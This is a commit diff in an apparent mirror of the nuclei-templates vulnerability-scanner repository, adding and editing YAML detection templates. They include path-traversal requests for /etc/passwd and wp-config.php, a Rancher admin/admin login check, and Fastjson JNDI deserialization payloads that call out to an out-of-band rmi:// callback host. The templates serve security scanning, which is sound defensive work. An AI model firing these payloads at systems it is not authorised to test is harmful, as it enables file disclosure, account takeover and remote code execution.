daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
Divya 2021-10-16 12:45:24 -04:00 committed by GitHub
parent 96b1add109 e5a4764232
commit 20f4257f91
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
49 changed files with 1679 additions and 972 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/workflows/templates-stats.yml vendored
View File

@ -1,6 +1,9 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
**171 directories, 2333 files**.
**175 directories, 2366 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1800
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |

3
cves/2019/CVE-2019-6340.yaml
View File

@ -38,8 +38,9 @@ requests:
words:
- "uid="
- "gid="
- "groups="
condition: and
part: body
- type: status
status:
- 200
- 200

30
cves/2021/CVE-2021-40438.yaml Normal file
View File

File diff suppressed because one or more lines are too long

28
cves/2021/CVE-2021-40978.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-40978
info:
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
author: pikpikcu
severity: high
reference:
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
requests:
- method: GET
path:
- '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200

16
vulnerabilities/other/ecoa-building-lfi.yaml → cves/2021/CVE-2021-41291.yaml
View File

@ -1,12 +1,19 @@
id: ecoa-building-lfi
id: CVE-2021-41291
info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
tags: ecoa,lfi
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41291
cwe-id: CWE-22
requests:
- raw:
@ -17,5 +24,4 @@ requests:
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- "root:.*:0:0:"

35
cves/2021/CVE-2021-41293.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-41293
info:
name: ECOA Building Automation System - LFD
author: 0x_Akoko
severity: high
description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41293
cwe-id: CWE-22
requests:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

4
cves/2021/CVE-2021-41773.yaml
View File

@ -17,6 +17,8 @@ info:
cvss-score: 7.50
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
requests:
- raw:
@ -42,4 +44,4 @@ requests:
- type: word
name: RCE
words:
- "CVE-2021-41773"
- "CVE-2021-41773"

52
default-logins/rancher/rancher-default-login.yaml Normal file
View File

@ -0,0 +1,52 @@
id: rancher-default-login
info:
name: Rancher Default Login
author: princechaddha
severity: high
description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
reference: https://github.com/rancher/rancher
tags: default-login,rancher,kubernetes,devops,cloud
requests:
- raw:
- |
GET /v3/settings/first-login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
- |
POST /v3-public/localProviders/local?action=login HTTP/1.1
Host: {{Hostname}}
Cookie: CSRF={{csrf}}
X-Api-Csrf: {{csrf}}
Connection: close
Content-Length: 136
{"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'R_SESS=token'
part: header
extractors:
- type: regex
name: csrf
group: 1
internal: true
part: header
regex:
- 'Set-Cookie: CSRF=([a-z0-9]+)'

25
exposed-panels/cisco/cisco-ace-device-manager.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-ace-device-manager
info:
name: ACE 4710 Device Manager
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'html:"ACE 4710 Device Manager"'
requests:
- method: GET
path:
- "{{BaseURL}}/index.vm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>ACE 4710 DM - Login</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-edge-340.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-edge-340
info:
name: Cisco Edge 340
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Edge 340"'
requests:
- method: GET
path:
- "{{BaseURL}}/auth/?next=%2F"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco Edge 340</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-secure-cn.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-secure-cn
info:
name: Cisco Secure CN
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Secure CN"'
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco Secure CN</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-systems-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-systems-login
info:
name: Cisco Systems Login
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Systems Login"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<TITLE>Cisco Systems Login</TITLE>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-telepresence.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-telepresence
info:
name: Cisco Telepresence
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Telepresence"'
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco TelePresence MCU - login:</title>"
- type: status
status:
- 200

34
exposed-panels/rancher-panel.yaml Normal file
View File

@ -0,0 +1,34 @@
id: rancher-panel
info:
name: Rancher Login Panel
author: princechaddha
severity: info
description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
reference: https://github.com/rancher/rancher
tags: panel,rancher,kubernetes,devops,cloud
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Loading&hellip;</title>"
- "global-admin/config/environment"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<!\-\- ([0-9. ]+)\-\->'

0
misconfiguration/phpmyadmin-setup.yaml → misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
View File

0
misconfiguration/phpmyadmin-sql.php-server.yaml → misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
View File

35
misconfiguration/phpmyadmin/pma-server-import.yaml Normal file
View File

@ -0,0 +1,35 @@
id: pma-server-import
info:
name: PhpMyAdmin Server Import
author: Cristi vlad (@cristivlad25)
severity: high
description: Finds Unauthenticated PhpMyAdmin Server Import Pages.
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/pma/server_import.php"
- "{{BaseURL}}/phpmyadmin/server_import.php"
- "{{BaseURL}}/phpMyAdmin 2/server_import.php"
- "{{BaseURL}}/db/server_import.php"
- "{{BaseURL}}/server_import.php"
- "{{BaseURL}}/PMA/server_import.php"
- "{{BaseURL}}/admin/server_import.php"
- "{{BaseURL}}/admin/pma/server_import.php"
- "{{BaseURL}}/phpMyAdmin/server_import.php"
- "{{BaseURL}}/admin/phpMyAdmin/server_import.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "File to import"
- "Location of the text file"
- type: status
status:
- 200

25
technologies/aviatrix-detect.yaml
View File

@ -2,7 +2,7 @@ id: aviatrix-detect
info:
name: Aviatrix Detect
author: pikpikcu
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
@ -10,15 +10,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/assets/img/favicon-32x32.png"
matchers-condition: and
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: "title"
condition: and
dsl:
- 'contains(body, "<title>Aviatrix")'
- 'contains(body, "Controller</title>")'
- 'status_code == 200'
- type: word
part: body
words:
- "<title>Aviatrix Controller</title>"
- type: status
status:
- 200
- type: dsl
name: "favicon"
dsl:
- "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))"

4
technologies/confluence-detect.yaml
View File

@ -5,7 +5,9 @@ info:
author: philippedelteil
severity: info
description: Allows you to detect Atlassian Confluence instances
tags: tech,confluence
tags: tech,confluence,atlassian
metadata:
shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22
requests:
- method: GET

1
token-spray/iterable.yaml
View File

@ -20,3 +20,4 @@ requests:
negative: true
words:
- 'BadApiKey'
- 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve

51
vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml Normal file
View File

@ -0,0 +1,51 @@
id: fastjson-1.2.24-rce
info:
name: Fastjson 1.2.24 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
- https://www.freebuf.com/vuls/208339.html
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Internal Server Error"
- "500"

35
vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.41-rce
info:
name: Fastjson 1.2.41 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"Lcom.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

35
vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.42-rce
info:
name: Fastjson 1.2.42 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

35
vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.43-rce
info:
name: Fastjson 1.2.43 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

44
vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml Normal file
View File

@ -0,0 +1,44 @@
id: fastjson-1.2.47-rce
info:
name: Fastjson 1.2.47 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
- https://www.freebuf.com/vuls/208339.html
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Bad Request"
- "400"

34
vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml Normal file
View File

@ -0,0 +1,34 @@
id: fastjson-1.2.62-rce
info:
name: Fastjson 1.2.62 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
"AsText":"rmi://{{interactsh-url}}/exploit"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

37
vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml Normal file
View File

@ -0,0 +1,37 @@
id: fastjson-1.2.67-rce
info:
name: Fastjson 1.2.67 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
"properties":{
"@type":"java.util.Properties",
"UserTransaction":"rmi://{{interactsh-url}}/Exploit"
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

55
vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml Normal file
View File

@ -0,0 +1,55 @@
id: fastjson-1.2.68-rce
info:
name: Fastjson 1.2.68 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
"jndiNames":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
"metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

6
vulnerabilities/other/bitrix-open-redirect.yaml
View File

@ -4,12 +4,12 @@ info:
name: Bitrix Open URL redirect detection
author: pikpikcu
severity: low
description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
tags: redirect,bitrix
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
@ -33,7 +33,7 @@ requests:
part: header
- type: status
condition: or
status:
- 302
- 301
condition: or
- 301

2
vulnerabilities/other/commax-biometric-auth-bypass.yaml
View File

@ -4,7 +4,7 @@ info:
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
author: gy741
severity: critical
description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
reference:
- https://www.exploit-db.com/exploits/50206
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php

1
vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
View File

@ -4,6 +4,7 @@ info:
name: DedeCmsV5.6 Carbuyaction Fileinclude
author: pikpikcu
severity: high
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference: https://www.cnblogs.com/milantgh/p/3615986.html
tags: dedecms

1
vulnerabilities/other/dedecms-membergroup-sqli.yaml
View File

@ -4,6 +4,7 @@ info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms

27
vulnerabilities/other/ecoa-building-automation-lfd.yaml
View File

@ -1,27 +0,0 @@
id: ecoa-building-automation-lfd
info:
name: ECOA Building Automation System - LFD
author: 0x_Akoko
severity: high
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
tags: ecoa,lfi
requests:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
condition: and
- type: status
status:
- 200

2
vulnerabilities/other/fatpipe-backdoor.yaml
View File

@ -4,7 +4,7 @@ info:
name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
author: gy741
severity: high
description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
- https://www.fatpipeinc.com/support/advisories.php

3
vulnerabilities/other/geovision-geowebserver-lfi.yaml
View File

@ -4,7 +4,8 @@ info:
name: GeoVision Geowebserver 5.3.3 - LFI
author: madrobot
severity: high
reference: https://www.exploit-db.com/exploits/50211
description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
tags: geowebserver,lfi
requests:

3
vulnerabilities/other/geovision-geowebserver-xss.yaml
View File

@ -4,7 +4,8 @@ info:
name: GeoVision Geowebserver 5.3.3 - XSS
author: madrobot
severity: medium
reference: https://www.exploit-db.com/exploits/50211
description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
tags: geowebserver,xss
requests:

3
vulnerabilities/other/h3c-imc-rce.yaml
View File

@ -1,9 +1,10 @@
id: h3c-imc-rce
info:
name: H3c IMC Rce
name: H3c IMC RCE
author: pikpikcu
severity: critical
description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
tags: rce,h3c-imc

1
vulnerabilities/other/hasura-graphql-psql-exec.yaml
View File

@ -4,6 +4,7 @@ info:
author: Udyz
name: Hasura GraphQL Engine - postgresql query exec
severity: critical
description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
reference: https://www.exploit-db.com/exploits/49802
tags: hasura,rce

1
vulnerabilities/other/hiboss-rce.yaml
View File

@ -4,6 +4,7 @@ info:
name: Hiboss RCE
author: pikpikcu
severity: critical
description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
tags: hiboss,rce

1
vulnerabilities/other/karel-ip-phone-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
author: 0x_Akoko
severity: high
description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon

1
vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it.
reference: https://cxsecurity.com/issue/WLB-2020030185
tags: wordpress,wp-theme,redirect

1
vulnerabilities/wordpress/brandfolder-lfi.yaml
View File

@ -4,6 +4,7 @@ info:
name: Wordpress brandfolder plugin - RFI & LFI
author: 0x_Akoko
severity: high
description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
reference:
- https://www.exploit-db.com/exploits/39591
- https://cxsecurity.com/issue/WLB-2016030120

3
vulnerabilities/wordpress/brandfolder-open-redirect.yaml
View File

@ -1,9 +1,10 @@
id: brandfolder-open-redirect
info:
name: Wordpress brandfolder plugin Open Redirect
name: WordPress Brandfolder Plugin Open Redirect
author: 0x_Akoko
severity: low
description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
reference: https://www.exploit-db.com/exploits/39591
tags: wordpress,wp-plugin,lfi,rfi

29
vulnerabilities/wordpress/cherry-file-download.yaml Normal file
View File

@ -0,0 +1,29 @@
id: cherry-file-download
info:
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
author: 0x_Akoko
severity: high
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
reference:
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- https://github.com/CherryFramework/cherry-plugin
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
